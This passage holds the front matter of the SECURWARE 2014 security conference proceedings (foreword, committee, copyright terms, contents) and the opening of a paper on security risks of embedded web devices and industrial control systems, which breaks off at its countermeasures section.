SECURWARE 2014
The Eighth International Conference on Emerging Security Information, Systems
and Technologies
ISBN: 978-1-61208-376-6
November 16 - 20, 2014
Lisbon, Portugal
SECURWARE 2014 Editors
Rainer Falk, Siemens AG - München, Germany
Carlos Becker Westphall, Federal University of Santa Catarina, Brazil
SECURWARE 2014
Foreword
The Eighth International Conference on Emerging Security Information, Systems and
Technologies (SECURWARE 2014), held between November 16-20, 2014 in Lisbon, Portugal,
continued a series of events covering related topics on theory and practice on security,
cryptography, secure protocols, trust, privacy, confidentiality, vulnerability, intrusion detection
and other areas related to low enforcement, security data mining, malware models, etc.
Security, defined for ensuring protected communication among terminals and user
applications across public and private networks, is the core for guaranteeing confidentiality,
privacy, and data protection. Security affects business and individuals, raises the business risk,
and requires a corporate and individual culture. In the open business space offered by Internet,
it is a need to improve defenses against hackers, disgruntled employees, and commercial rivals.
There is a required balance between the effort and resources spent on security versus security
achievements. Some vulnerability can be addressed using the rule of 80:20, meaning 80% of the
vulnerabilities can be addressed for 20% of the costs. Other technical aspects are related to the
communication speed versus complex and time consuming cryptography/security mechanisms
and protocols.
Digital Ecosystem is defined as an open decentralized information infrastructure where
different networked agents, such as enterprises (especially SMEs), intermediate actors, public
bodies and end users, cooperate and compete enabling the creation of new complex structures.
In digital ecosystems, the actors, their products and services can be seen as different organisms
and species that are able to evolve and adapt dynamically to changing market conditions.
Digital Ecosystems lie at the intersection between different disciplines and fields:
industry, business, social sciences, biology, and cutting edge ICT and its application driven
research. They are supported by several underlying technologies such as semantic web and
ontology-based knowledge sharing, self-organizing intelligent agents, peer-to-peer overlay
networks, web services-based information platforms, and recommender systems.
We take here the opportunity to warmly thank all the members of the SECURWARE
2014 Technical Program Committee, as well as the numerous reviewers. The creation of such a
high quality conference program would not have been possible without their involvement. We
also kindly thank all the authors who dedicated much of their time and efforts to contribute to
SECURWARE 2014. We truly believe that, thanks to all these efforts, the final conference
program consisted of top quality contributions.
Also, this event could not have been a reality without the support of many individuals,
organizations, and sponsors. We are grateful to the members of the SECURWARE 2014
organizing committee for their help in handling the logistics and for their work to make this
professional meeting a success.
We hope that SECURWARE 2014 was a successful international forum for the exchange
of ideas and results between academia and industry and for the promotion of progress in
emerging security information, systems and technologies.
We are convinced that the participants found the event useful and communications very
open. We hope Lisbon provided a pleasant environment during the conference and everyone
saved some time for exploring this beautiful city.
SECURWARE 2014 Chairs:
SECURWARE Advisory Chairs
Juha Rőning, University of Oulu, Finland
Catherine Meadows, Naval Research Laboratory - Washington DC, USA
Petre Dini, Concordia University, Canada / China Space Agency Center - Beijing, China
Reijo Savola, VTT Technical Research Centre of Finland, Finland
Masaru Takesue, Hosei University, Japan
Mariusz Jakubowski, Microsoft Research, USA
Emmanoil Serelis, University of Piraeus, Greece
William Dougherty, Secern Consulting - Charlotte, USA
SECURWARE 2014 Industry Liaison Chair
Rainer Falk, Siemens AG - München, Germany
SECURWARE 2014 Research/Industry Chair
Mariusz Jakubowski, Microsoft Research, USA
SECURWARE 2014
Committee
SECURWARE Advisory Chairs
Juha Rőning, University of Oulu, Finland
Catherine Meadows, Naval Research Laboratory - Washington DC, USA
Petre Dini, Concordia University, Canada / China Space Agency Center - Beijing, China
Reijo Savola, VTT Technical Research Centre of Finland, Finland
Masaru Takesue, Hosei University, Japan
Mariusz Jakubowski, Microsoft Research, USA
Emmanoil Serelis, University of Piraeus, Greece
William Dougherty, Secern Consulting - Charlotte, USA
SECURWARE 2014 Industry Liaison Chair
Rainer Falk, Siemens AG - München, Germany
SECURWARE 2014 Research/Industry Chair
Mariusz Jakubowski, Microsoft Research, USA
SECURWARE 2014 Technical Program Committee
Habtamu Abie, Norwegian Computing Center - Oslo, Norway
Afrand Agah, West Chester University of Pennsylvania, USA
Maurizio Aiello, National Research Council of Italy - IEIIT, Italy
Jose M. Alcaraz Calero, University of the West of Scotland, United Kingdom
Firkhan Ali Bin Hamid Ali, Universiti Tun Hussein Onn Malaysia, Malaysia
Hamada Alshaer, Khalifa University of Science, Technology & Research (KUSTAR), UAE
Claudio Agostino Ardagna, Università degli Studi di Milano, Italy
David Argles, Haven Consulting, UK
George Athanasiou, KTH Royal Institute of Technology, Sweden
Ilija Basicevic, University of Novi Sad, Serbia
Lejla Batina, Radboud University Nijmegen, The Netherlands
Georg T. Becker, University of Massachusetts Amherst, USA
Carlos Becker Westphall, Federal University of Santa Catarina, Brazil
Francisco Jose Bellido Outeiriño, University of Cordoba, Spain
Malek Ben Salem, Accenture Technology Labs, USA
Jorge Bernal Bernabé, University of Murcia, Spain
Catalin V. Birjoveanu, "Al.I.Cuza" University of Iasi, Romania
Lorenzo Blasi, Hewlett-Packard, Italy
Carlo Blundo, Università di Salern, Italy
Wolfgang Boehmer, Technische Universitaet Darmstadt, Germany
Ravishankar Borgaonkar, Technical University Berlin and Deutsche Telekom Laboratories, Germany
Jérémy Briffaut, ENSI - Bourges, France
Julien Bringer, SAFRAN Morpho, France
Christian Callegari, University of Pisa, Italy
Juan Vicente Capella Hernández, Universidad Politécnica de Valencia, Spain
Hervé Chabanne, Morpho & Télécom ParisTech, France
Hyunseok Chang, Bell Labs/Alcatel-Lucent, USA
Fei Chen, VMware, Inc., USA
Lisha Chen-Wilson, University of Southampton, UK
Feng Cheng, Hasso-Plattner-Institute at University of Potsdam, Germany
Jin-Hee Cho, US Army Research Laboratory Adelphi, USA
Te-Shun Chou, East Carolina University - Greenville, USA
Cheng-Kang Chu, Institute for Infocomm, Singapore
Mario Ciampi, National Research Council of Italy - Institute for High Performance Computing and
Networking (ICAR-CNR), Italy
Stelvio Cimato, Università degli studi di Milano - Crema, Italy
David Chadwick, University of Kent, UK
Frédéric Cuppens, Télécom Bretagne, France
Pierre de Leusse, HSBC, Poland
Sagarmay Deb, Central Queensland University, Australia
Mourad Debbabi, Concordia University, Canada
Tassos Dimitriou, Computer Technology Institute, Greece / Kuwait University, Kuwait
Changyu Dong, University of Strathclyde, U.K.
Zheng Dong, Indiana University Bloomington, USA
Safwan El Assad, University of Nantes, France
El-Sayed El-Alfy, King Fahd University of Petroleum and Minerals - Dhahran, KSA
Wael Mohamed El-Medany, University Of Bahrain, Bahrain
Navid Emamdoost, University of Minnesota, USA
Keita Emura, National Institute of Information and Communications Technology (NICT), Japan
David Eyers, University of Otago, New Zealand
Rainer Falk, Siemens AG - München, Germany
Eduardo B. Fernandez, Florida Atlantic University - Boca Raton, USA
Luca Ferretti, University of Modena and Reggio Emilia, Italy
Ulrich Flegel, HFT Stuttgart University of Applied Sciences, Germany
Anders Fongen, Norwegian Defence Research Establishment, Norway
Robert Forster, Edgemount Solutions, USA
Keith Frikken, Miami University, USA
Somchart Fugkeaw, Thai Digital ID Co., Ltd. - Bangkok, Thailand
Amparo Fuster-Sabater, Information Security Institute (CSIC), Spain
Clemente Galdi, Universit`a di Napoli “Federico II”, Italy
Amjad Gawanmeh, Khalifa University of Science, Technology & Research - Sharjah, UAE
Bogdan Ghita, Plymouth University, UK
Danilo Gligoroski, Norwegian University of Science and Technology, Norway
Luis Gomes, Universidade Nova de Lisboa, Portugal
Hidehito Gomi, Yahoo! JAPAN Research, Japan
Pankaj Goyal, MicroMega, Inc., USA
Stefanos Gritzalis, University of the Aegean, Greece
Vic Grout, Glyndŵr University - Wrexham, UK
Yao Guo, Pekin University, China
Bidyut Gupta, Southern Illinois University Carbondale, USA
Kevin Hamlen, University of Texas at Dallas, U.S.A.
Petr Hanáček, Brno University of Technology - Czech Republic
Ragib Hasan, University of Alabama at Birmingham, USA
Benjamin Hirsch, EBTIC / Khalifa University of Science Technology & Research - Abu Dhabi, UAE
Hans-Joachim Hof, Munich University of Applied Sciences, Germany
Fu-Hau Hsu, National Central University, Taiwan
Jiankun Hu, Australian Defence Force Academy - Canberra, Australia
Sergio Ilarri, University of Zaragoza, Spain
Mariusz Jakubowski, Microsoft Research, USA
Ravi Jhawar, Università degli Studi di Milano, Italy
Dan Jiang, Philips Research Shanghai, China
Andrew Jones, Khalifa University of Science Technology and Research - Abu Dhabi, UAE
Dimitrios A. Karras, Chalkis Institute of Technology, Hellas
Vasileios Karyotis, NTUA, Greece
Masaki Kasuya, Rakuten Inc., Japan
Sokratis K. Katsikas, University of Piraeus, Greece
Hyunsung Kim, Kyungil University, Korea
Kwangjo Kim, KAIST, Korea
Daniel Kimmig, Karlsruhe Institute of Technology, Germany
Ezzat Kirmani, St. Cloud State University, USA
Geir M. Køien, University of Agder, Norway
Stephan Kopf, University of Mannheim, Germany
Hristo Koshutanski, University of Malaga, Spain
Igor Kotenko, St. Petersburg Institute for Informatics and Automation of the Russian Academy of Science
(SPIIRAS), Russia
Stephan Krenn, IBM Research - Zurich, Switzerland
Jakub Kroustek, Brno University of Technology, Czech Republic
Lam-for Kwok, City University of Hong Kong, Hong Kong
Ruggero Donida Labati, Università degli Studi di Milano, Italy
Jean-François Lalande, Ecole Nationale Supérieure d'Ingénieurs de Bourges, France
Gyungho Lee, Korea University - Seoul, Korea
Marcello Leida, Khalifa University - Abu Dhabi, UAE
Zhuowei Li, Microsoft, USA
Giovanni Livraga, Università degli Studi di Milano - Crema, Italy
Jaime Lloret Mauri, Polytechnic University of Valencia, Spain
Jiqiang Lu, Institute for Infocomm Research, Singapore
Flaminia L. Luccio, University Ca' Foscari Venezia, Italy
Wissam Mallouli, Montimage, France
Feng Mao, EMC, USA
Milan Marković, Banca Intesa ad Beograd, Serbia
Juan Manuel Marín Pérez, University of Murcia, Spain
Claudia Marinica, ENSEA/University of Cergy-Pontoise/CNRS - Cergy-Pontoise, France
Gregorio Martinez, University of Murcia, Spain
Ádám Földes Máté, Budapest University of Technology and Economics (BME), Hungary
Wojciech Mazurczyk, Warsaw University of Technology, Poland
Catherine Meadows, Naval Research Laboratory-Washington DC, USA
Yuxin Meng, City University of Hong Kong, Hong Kong
Carla Merkle Westphall, Federal University of Santa Catarina, Brazil
Ajaz Hussain Mir, National Institute of Technology Srinagar - Kashmir, India
Hasan Mirjalili, EPFL - Lausanne, Switzerland
Rabeb Mizouni, Khalifa University of Science, Technology & Research (KUSTAR) - Abu Dhabi, UAE
Masoud Mohammadian, University of Canberra, Australia
Theodosis Mourouzis, University College London, U.K.
Jose M. Moya, Universidad Politécnica de Madrid, Spain
Antonio Nappa, IMDEA Software Institute, Spain
David Navarro, Ecole Centrale de Lyon, France
Mathew Nicho, University of Dubai, UAE
Jason R.C. Nurse, Cyber Security Centre - University of Oxford, UK
Jose A. Onieva, Universidad de Malaga, Spain
Andres Ortiz, Universidad de Málaga, Spain
Federica Paganelli, National Interuniversity Consortium for Telecommunications (CNIT), Italy
Alain Patey, Morpho Issy-Les-Moulineaux, France
Alwyn Roshan Pais, National Institute of Technology Karnataka, India
Carlos Enrique Palau Salvador, Universidad Politecnica de Valencia, Spain
András Pataricza, Budapest University of Technology and Economics, Hungary
Al-Sakib Khan Pathan, International Islamic University Malaysia (IIUM) - Kuala Lumpur, Malaysia
Ella Pereira, Edge Hill University, UK
Pedro Peris López, Universidad Carlos III de Madrid, Spain
Zeeshan Pervez, University of the West of Scotland, UK
Alexander Polyakov, ERPScan / EAS-SEC Organization, Russia
Sergio Pozo Hidalgo, University of Seville, Spain
M. Zubair Rafique, KU Leuven, Belgium
Sherif Rashad, Morehead State University, USA
Danda B. Rawat, Georgia Southern University, USA
Indrajit Ray, Colorado State University, U.S.A.
Tzachy Reinman, The Hebrew University of Jerusalem, Israel
Shangping Ren, Illinois Institute of Technology - Chicago, USA
Eric Renault, Institut Mines-Télécom - Télécom SudParis, France
Eike Ritter, University of Birmingham, U.K.
Jean-Marc Robert, École de technologie supérieure - Montréal, Canada
Juha Rőning, University of Oulu, Finland
Heiko Rossnagel, Fraunhofer IAO - Stuttgart, Germany
Jonathan Rouzaud-Cornabas, INRIA - Lyon, France
Domenico Rotondi, TXT e-solutions SpA, Italy
Antonio Ruiz Martínez, University of Murcia, Spain
Giovanni Russello, University of Auckland, New Zeeland
Mohammed Saeed, University of Chester, UK
Rodrigo Sanches Miani, Universidade Federal de Uberlândia, Brazil
Reijo Savola, VTT Technical Research Centre of Finland, Finland
Mohamad Sbeiti, Technische Universität Dortmund, Germany
Roland Schmitz, Hochschule der Medien Stuttgart, Germany
Yuichi Sei, University of Electro-Communications, Japan
Jun Shao, Zhejiang Gongshang University, China
George Spanoudakis, City University London, UK
Lars Strand, Nofas, Norway
Krzysztof Szczypiorski, Warsaw University of Technology, Poland
Gang Tan, Lehigh University, USA
Li Tan, Washington State University, USA
Toshiaki Tanaka, KDDI R & D Laboratories Inc., Japan
Carlos Miguel Tavares Calafate, Universidad Politécnica de Valencia, Spain
Enrico Thomae, operational services GmbH & Co. KG, Germany
Tony Thomas, Indian Institute of Information Technology and Management - Kerala, India
Panagiotis Trimintzios, European Network and Information Security Agency (ENISA), Greece
Raylin Tso, National Chengchi University, Taiwan
Ion Tutanescu, University of Pitesti, Romania
Shambhu Upadhyaya , State University of New York at Buffalo, USA
Miroslav Velev, Aries Design Automation, USA
José Francisco Vicent Francés, University of Alicante, Spain
Calin Vladeanu, "Politehnica" University of Bucharest, Romania
Tomasz Walkowiak, Wrocław University of Technology, Poland
Alex Hai Wang, The Pennsylvania State University, USA
Shiyuan Wang, Google Inc., USA
Wendy Hui Wang, Stevens Institute of Technology - Hoboken, USA
Wenhua Wang, Marin Software Company, USA
Steffen Wendzel, Fraunhofer FKIE, Bonn, Germany
Matthias Wieland, Universitaet Stuttgart, Germany
Wojciech Wodo, Wroclaw University of Technology, Poland
Tzong-Chen Wu, National Taiwan University of Science & Technology, Taiwan
Yongdong Wu, Institute for Infocomm Research, Singapore
Yang Xiang, Deakin University - Melbourne Burwood Campus, Australia
Sung-Ming Yen, National Central University, Taiwan
Xie Yi, Sun Yat-Sen University - Guangzhou, P. R. China
Xun Yi, Victoria University - Melbourne, Australia
Hiroshi Yoshiura, The University of Electro-Communications, Japan
Heung Youl Youm, KIISC, Korea
Amr Youssef, Concordia University - Montreal, Canada
Jun Zhang, Deakin University, Geelong Waurn Ponds Campus, Australia
Wenbing Zhao, Cleveland State University, USA
Yao Zhao, Beijing Jiaotong University, P. R. China
Xinliang Zheng, Frostburg State University, USA
Albert Zomaya, The University of Sydney, Australia
Copyright Information
For your reference, this is the text governing the copyright release for material published by IARIA.
The copyright release is a transfer of publication rights, which allows IARIA and its partners to drive the
dissemination of the published material. This allows IARIA to give articles increased visibility via
distribution, inclusion in libraries, and arrangements for submission to indexes.
I, the undersigned, declare that the article is original, and that I represent the authors of this article in
the copyright release matters. If this work has been done as work-for-hire, I have obtained all necessary
clearances to execute a copyright release. I hereby irrevocably transfer exclusive copyright for this
material to IARIA. I give IARIA permission or reproduce the work in any media format such as, but not
limited to, print, digital, or electronic. I give IARIA permission to distribute the materials without
restriction to any institutions or individuals. I give IARIA permission to submit the work for inclusion in
article repositories as IARIA sees fit.
I, the undersigned, declare that to the best of my knowledge, the article is does not contain libelous or
otherwise unlawful contents or invading the right of privacy or infringing on a proprietary right.
Following the copyright release, any circulated version of the article must bear the copyright notice and
any header and footer information that IARIA applies to the published article.
IARIA grants royalty-free permission to the authors to disseminate the work, under the above
provisions, for any academic, commercial, or industrial use. IARIA grants royalty-free permission to any
individuals or institutions to make the article available electronically, online, or in print.
IARIA acknowledges that rights to any algorithm, process, procedure, apparatus, or articles of
manufacture remain with the authors and their employers.
I, the undersigned, understand that IARIA will not be liable, in contract, tort (including, without
limitation, negligence), pre-contract or other representations (other than fraudulent
misrepresentations) or otherwise in connection with the publication of my work.
Exception to the above is made for work-for-hire performed while employed by the government. In that
case, copyright to the material remains with the said government. The rightful owners (authors and
government entity) grant unlimited and unrestricted permission to IARIA, IARIA's contractors, and
IARIA's partners to further distribute the work.
Table of Contents
Embedded Web Device Security
Michael Riegler and Johannes Sametinger
1
Design Issues in the Construction of a Cryptographically Secure Instant Message Service for Android
Smartphones
Alexandre Braga and Daniela Schwab
7
Resisting Flooding Attacks on AODV
Mohamed A. Abdelshafy and Peter J.B. King
14
The Policy-Based AS_PATH Verification to Monitor AS Path Hijacking
Je-Kuk Yun, Beomseok Hong, and Yanggon Kim
20
A New Property Coding in Text Steganography of Microsoft Word Documents
Ivan Stojanov, Aleksandra Mileva, and Igor Stojanovic
25
Audio Steganograpgy by Phase Modification
Fatiha Djebbar and Beghdad Ayad
31
Current Issues in Cloud Computing Security and Management
Pedro Artur Figueiredo Vitti, Daniel Ricardo dos Santos, Carlos Becker Westphall, Carla Merkle Westphall, and
Kleber Magno Maciel Vieira
36
N-Gram-Based User Behavioral Model for Continuous User Authentication
Leslie Milton, Bryan Robbins, and Atif Memon
43
GAIA-MLIS: A Maturity Model for Information Security
Roger William Coelho, Gilberto Fernandes Junior, and Mario Lemes Proenca Junior
50
Security of Vehicular Networks: Static and Dynamic Control of Cyber-Physical Objects
Vladimir Muliukha, Vladimir Zaborovsky, and Sergey Popov
56
Digital Signature of Network Segment Using Genetic Algorithm and Ant Colony Optimization Metaheuristics
Paulo R. G. Hernandes Jr., Luiz F. Carvalho, Gilberto Fernandes Jr., and Mario L. Proenca Jr.
62
DeadDrop-in-a-Flash: Information Hiding at SSD NAND Flash Memory Physical Layer
Avinash Srinivasan, Jie Wu, Panneer Santhalingam, and Jeffrey Zamanski
68
Saving Privacy in Trust-Based User-Centric Distributed Systems
Alessandro Aldini
76
Enhancing Privacy on Identity Providers
Rafael Weingartner and Carla Merkle Westphall
82
Enforcing Security Policies on Choreographed Services Using Rewriting Techniques
Karim Dahmani and Mahjoub Langar
89
Obtaining Strong Identifiers Through Attribute Aggregation
Walter Priesnitz Filho and Carlos Nuno da Cruz Ribeiro
96
Wi-Fi Intruder Detection
Rui Fernandes, Tiago Varum, Nuno Matos, and Pedro Pinho
101
Adding Secure Deletion to an Encrypted File System on Android Smartphones
Alexandre Braga and Alfredo Colito
106
Performance Impacts in Database Privacy-Preserving Biometric Authentication
Jana Dittmann, Veit Koppen, Christian Kratzer, Martin Leuckert, Gunter Saake, and Claus Vielhauer
111
Data Quality and Security Evaluation Tool for Nanoscale Sensors
Leon Reznik and Sergey Lyshevski
118
AndroSAT: Security Analysis Tool for Android Applications
Saurabh Oberoi, Weilong Song, and Amr Youssef
124
Involvers’ Behavior-based Modeling in Cyber Targeted Attack
Youngsoo Kim and Ikkyun Kim
132
Test Case Generation Assisted by Control Dependence Analysis
Puhan Zhang, Qi Wang, Guowei Dong, Bin Liang, and Wenchang Shi
138
Implementation Issues in the Construction of Standard and Non-Standard Cryptography on Android Devices
Alexandre Braga and Eduardo Morais
144
Threshold Proxy Signature Based on Position
Qingshui Xue, Fengying Li, and Zhenfu Cao
151
Linearity Measures for Multivariate Public Key Cryptography
Simona Samardjiska and Danilo Gligoroski
157
Managed Certificate Whitelisting - A Basis for Internet of Things Security in Industrial Automation Applications
Rainer Falk and Steffen Fries
167
Challenges for Evolving Large-Scale Security Architectures
173
Geir Koien
Powered by TCPDF (www.tcpdf.org)
A Backtracking Symbolic Execution Engine with Sound Path Merging
Andreas Ibing
180
Security Extensions for Mobile Commerce Objects
Nazri Bin Abdullah, Ioannis Kounelis, and Sead Muftic
186
Attack Surface Reduction for Web Services based on Authorization Patterns
Roland Steinegger, Johannes Schafer, Max Vogler, and Sebastian Abeck
194
Evaluation of Vehicle Diagnostics Security – Implementation of a Reproducible Security Access
Martin Ring, Tobias Rensen, and Reiner Kriesten
202
An AMI Threat Detection Mechanism Based on SDN Networks
Po-Wen Chi, Chien-Ting Kuo, He-Ming Ruan, Shih-Jen Chen, and Chin-Laung Lei
208
Ghost Map: Proving Software Correctness using Games
Ronald Watro, Kerry Moffitt, Talib Hussain, Daniel Wyschogrod, John Ostwald, Derrick Kong, Clint Bowers,
Eric Church, Joshua Guttman, and Qinsi Wang
212
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Embedded Web Device Security
Michael Riegler
Johannes Sametinger
IT Solutions
RMTec
Baumgartenberg, Austria
michael.riegler@rmtec.at
Dept. of Information Systems – Software Engineering
Johannes Kepler University
Linz, Austria
johannes.sametinger@jku.at
Abstract—Due to the increasing networking of devices and
services to the Internet of Things, security requirements are
rising. Systems that were previously operated in isolation can
be attacked over the Internet today. Industrial control systems
often form the core of critical infrastructures. Their vulnerabilities and too lax security management can have fatal consequences. With the help of vulnerability databases and search
engines, hackers can get instructions and targets to exploit.
Routers, printers, cameras and other devices can be the gateway to the home or corporate network. Cyber criminals can
enter sensitive areas through inadequately protected remote
access. In a case study of a central water supply control system,
we present typical security problems. We show that security
vulnerabilities are wide-spread in current embedded web devices and demonstrate that appropriate countermeasures can
reduce the attack surface significantly.
access. We will outline the importance of the security of
such devices, demonstrate how neglected it is, and also present a case study of a water supply facility. The paper is
structured as follows. Section II introduces embedded web
devices. In Section III, we outline security aspects. Risks to
industrial control systems are described in Section IV. Section V explains how vulnerable web devices can be found on
the Internet. A case study is given in Section VI. Related
work and a conclusion follow in Sections VII and VIII, respectively.
Keywords-web; embedded devices; web security; industrial
control systems.
I.
INTRODUCTION
Embedded devices increasingly include connectivity as a
standard feature, putting them at risk to malicious attack if
not secured properly. Some device vendors are offering
solutions to protect their embedded devices, including antimalware technology, access control, data encryption, and
real-time threat analysis, as well as maintenance, support,
and update/patch services [8]. However, there is insufficient
awareness of both device manufacturers and their users
about the risks that stem from lacking protection. Take medical devices as an example. Today, even heart pacemakers
communicate wirelessly. Parameter settings can be sent to
the devices, and usage data including alerts are automatically
sent to manufacturers and clinics. If not properly secured,
these devices are a threat to patients’ privacy as well as to
their well-being and even life [12]. Users of devices like
personal computers, smartphones as well as operators of web
servers are typically aware to some extent about the security
risks. Security risks of devices that we use more unobtrusively often go unnoticed. Such devices include printers, routers,
and cameras [14]. Their use is widespread, they are connected to the Internet, they often provide web interfaces, and they
are often unprotected. On the road to a secure Internet of
Things (IoT) [3], we will have to do our homework and
provide security as needed to all devices.
In this paper, we will describe security issues of what we
call embedded web devices, i.e., embedded devices with web
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
II.
EMBEDDED WEB DEVICES
The Internet has started as a DARPA project, interconnecting computers through which everyone could quickly
access data and programs from any site. Today’s Internet
provides access to a plethora of information from not just
computers – back then only mainframes were available – but
from devices like smartphones, and television sets. Additionally, access is not limited to other computers but is
increasingly available to other devices like printers, routers
or webcams. Web devices are any devices that are connected
to the Internet via the Hypertext Transfer Protocol (HTTP)
protocol, including web servers, personal computers and
smartphones. Embedded web devices are with a different
focus than just providing and retrieving information on the
web. We have already mentioned printers, routers, and
webcams. Additional examples include network devices,
sensors in smart homes, smart meters in smart grids, smart
TVs, etc.
A. Embedded Web Servers
Web servers are running on a combination of hardware
and software. They deliver web content to be accessed
through the Internet. Embedded web servers are components
of systems that, like web servers, communicate via the HTTP
protocol. Typically, they provide a thin client interface for
traditional applications. Lightweight web servers work with
small resources and are often used in embedded systems.
Examples include Barracuda [41], Mongoose [26], Appweb
[2], and RomPager [33]. Embedded web servers are used for
special purpose and are not as extensive as major web servers like Apache [1] and Microsoft’s IIS [25].
Embedded web servers are important for the IoT. Today
computers and the Internet are almost completely dependent
on humans for information. Radio-frequency Identification
(RFID) and sensor technology enable computers to observe
1
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
and identify the world without the limitations of data entered
by humans [3]. IoT refers to uniquely identifiable objects,
e.g., sensors having an Internet Protocol (IP) address, and
their virtual representations in the Internet.
B. ICS – Industrial Control Systems
The term Industrial Control System (ICS) encompasses
several types of control systems that are used in industrial
production. Examples are Supervisory Control and Data
Acquisition (SCADA) systems, Distributed Control Systems
(DCS), and Programmable Logic Controllers (PLC). ICSs
are instrumental in the production of goods and in the provision of essential services, e.g., to monitor and control processes like gas and electricity distribution or water treatment.
The largest group of ICS is SCADA. For example, all nine
Austrian Danube power plants are controlled centrally from
Vienna. The stations are connected with optical fibers to the
central control room and cannot easily be accessed over the
Internet [42].
C. CPS – Cyber Physical Systems
Embedded systems contain computer systems with dedicated functions within larger mechanical or electrical systems, often having real-time computing constraints [13]. In
Cyber Physical Systems (CPS) computational elements collaborate to control physical entities. CPSs have a tight integration of cyber objects and physical objects. They can be
systems at various scales, e.g., large smart bridges with fluctuation detection and responding functions, autonomous cars,
and tiny implanted medical devices [15].
III.
SECURITY
Security is about protecting information and information
systems, including embedded devices, from unauthorized
access and use. The core goals are to retain confidentiality,
integrity and availability of information. Often used terms
include IT security, network security, computer security, web
security, mobile security, and software security. They describe different, but sometimes overlapping aspects of reaching the above mentioned core goals. For example, software
security is “the idea of engineering software so that it continues to function correctly under malicious attack” [23], while
network security involves the isolation and protection of
assets via firewalls, demilitarized zones and intrusion detection systems.
ment. We can assess risks by enumerating the most critical
and most likely threats, by evaluating their levels of risk as a
function of the probability of a threat and the associated cost
if the threat becomes true. Secure devices have to continue to
function correctly even if under malicious attack. Vulnerabilities are mistakes in devices, typically in software, which can
be directly used to gain access to the device. They pose a
threat to the device itself, to the information it contains, to
other devices it communicates with, and to the environment
that it manipulates.
B. ICS Security
ICSs are often found in critical infrastructures, thus have
a high need for security. A typical information network will
prioritize its security objectives as CIA, i.e., first confidentiality and integrity, and then availability. Industrial control
systems often have a high need for availability, reversing the
security objectives for most control entities [8]. Table 1
shows these different security goals.
There are other crucial differences that have an influence
on the security of these systems. Table 2 summarizes some
of these differences. For example, ICSs are usually real-time
systems, whereas in IT systems delays are acceptable most
of the time. Also, an ICS has to run continuously and cannot
simply be rebooted. More details are given by Stouffer et al.
[36].
According to a security survey, 70% of SCADA system
operators consider the risks to their systems to be high to
severe, and 33% suspect they may have had incidents [21].
While IT security is not entirely different from ICS security,
there are several differences; see [22]:
•
•
ICS security failures often have physical consequences, thus having more severe and immediate
impact.
ICS security failures can easily and wrongly be interpreted as traditional maintenance failures, making
them more difficult to diagnose and remedy.
Security management of an ICS is often much more difficult than of a regular IT system. They more often rely on
TABLE I.
DIFFERENCES BETWEEN TYPICAL IT AND ICS SYSTEMS
Category
A. Threats, Vulnerabilities, Risks
Threats refer to sources and means of particular types of
attacks. Vulnerabilities are security bugs or flaws in a system
that allow successful attacks. A security risk is the likelihood
of being targeted by a threat. The most important potential
threats to be addressed can be determined with a risk assessTABLE II. SECURITY GOALS IN IT AND ICS SYSTEMS
Priority
1
2
3
IT system
Confidentiality
Integrity
Availability
Copyright (c) IARIA, 2014.
ICS system
Availability
Integrity
Confidentiality
ISBN: 978-1-61208-376-6
Performance
Availability
Risk
Interaction
System
Resources
Lifetime
Support
Location
Virus
protection
IT system
Delay
acceptable
Reboot
acceptable
Data
confidentiality
Less critical
Standard OS
Sufficient
3-5 years
Diversified
Local,
easy accessible
ICS system
Human
safety
Critical
Proprietary OS
Limited
5-20 years
Single vendor
Remote,
isolated
Standard
Complex
Real-time
24 x 7 x 365
2
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
old systems that cannot be patched or upgraded any more.
They often do not have a suitable testing environment. They
also often require frequent remote access with commands
that must not be blocked for safety or production issues [22].
IV.
RISKS
Today, many systems are connected to the Internet, even
though they were not originally intended for that purpose.
Additionally, it has been shown that even systems without
any connection to the outside world can be at risk [35]. This
can be done by implanting tiny transceivers on hardware
parts like USB plugs or small circuit boards in a device.
A. Software Bugs
Prominent software security bugs include buffer overflows, SQL injections and cross-site scripting. They can be
exploited in any connected device, embedded or not. There
are many examples, where these bugs have occurred and
caused damage. While security bugs are problems at the
implementation level, security flaws are located at the architecture or design level. A list of the most widespread and
critical errors that can lead to serious vulnerabilities in software is presented in [39]. These errors are often easy to find,
easy to exploit and often dangerous. In many cases, they
allow attackers to steal and modify data, as well as to run
arbitrary code on the attacked machine. The Open Web Application Security Project (OWASP) is a not-for-profit organization focused on improving the security of software.
They regularly publish a list with the top 10 security bugs
with the goal to raise security awareness [40].
B. Back Doors
Reverse engineering of firmware often reveals back
doors to devices. Developers often have implemented hard
coded user names and passwords for debugging and maintenance purposes. For example, two supposedly hidden user
accounts are in the Sitecom WLM-3500 router. The manufacturer has released a new version of the firmware where
these accounts were disabled, but thousands with the old
version are still accessible via the Internet [30]. Other network devices like webcams or printers often suffer from
similar problems. These devices are usually used for years
without getting too much attention from their owners. But
they can provide an ideal entry for malicious attackers. For
example, thousands of webcams have been shown to be
accessible via back doors at the Black Hat 2013 conference
[14].
C. Configurations
Insecure default configurations make it easier for cyber
criminals to enter systems. Default passwords are publicly
known and are published on websites like [7][41].
Default running services like Universal Plug and Play
(UPnP) are often unused and increase the risk of an attack.
Google Hacking and Shodan simplify the search for such
insecure systems; see Section 5. With the mobile exploitation
framework Routerpwn [34] it is possible to get access to
routers, switches and access points from over 30 manufacturers. The 150+ provided exploits could be executed over
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
the browser locally and remote over the Internet. Predefined
access keys especially for the wireless network can be discovered when the calculation methods are known.
D. Other Risks
Automatic update functions, as we know them from
desktop operating systems, are not the general rule for ICSs.
Firmware manufacturers usually take their time with the
provision of updates. The fact that such updates are often
provided for free apparently does not motivate to more frequent updates. Sometimes, updates are not even provided at
all. But even if updates are available, private customers may
not know about them or may simply not have any interest in
installing them. Professional users may refrain from updates
when they cannot be performed without shutting down the
system. Updating a system can lead to crashes or may need
reconfigurations of parts or even the entire system. System
crashes can disrupt or paralyze business operations. In addition to technical risks, legal risks may also be involved.
Attacks can be a problem for managers. Insufficient security management can lead to personal responsibility. The
company may use their staff or service providers to reach the
security goals. However, the final responsibility remains
with the company. Unsecured or poorly secured home networks have already led to court proceedings. In case of damage, device misconfiguration and insufficient secured smart
home solutions can result in problems with the insurance.
E. Countermeasures
Measures for enhanced security are manifold and have to
be taken at various levels. Measures at the technical level
